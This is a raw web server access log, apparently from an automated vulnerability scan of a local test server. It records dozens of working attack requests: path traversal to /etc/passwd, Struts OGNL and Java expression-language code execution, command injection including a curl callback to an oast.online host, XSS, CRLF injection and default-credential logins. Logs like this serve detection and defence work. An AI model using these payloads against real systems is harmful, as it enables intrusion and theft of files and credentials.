}}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sfwd-lms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22params\x22:\x22w=123\x5C\x22'1234123'\x5C\x22|cat /etc/passwd\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KFpb03pxLt7ObWxJaQRUfrUHu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-----------------------------20873900192357278038549710136\x0D\x0AContent-Disposition: form-data; name=\x22file1\x22; filename=\x22poc.aspx\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A29KFpSlRm3RIyBdjv6THVUVwr5b\x0D\x0A-----------------------------20873900192357278038549710136--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"\x22name\x22:\x22';$(curl http://ca28q98smpvbk9ig07h0383pxot85oe4x.oast.online);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"LoH0v0mH","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /functionRouter HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KFpPukM4rHc0DNwrFfsG7X6Hy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-sample.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /code?dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 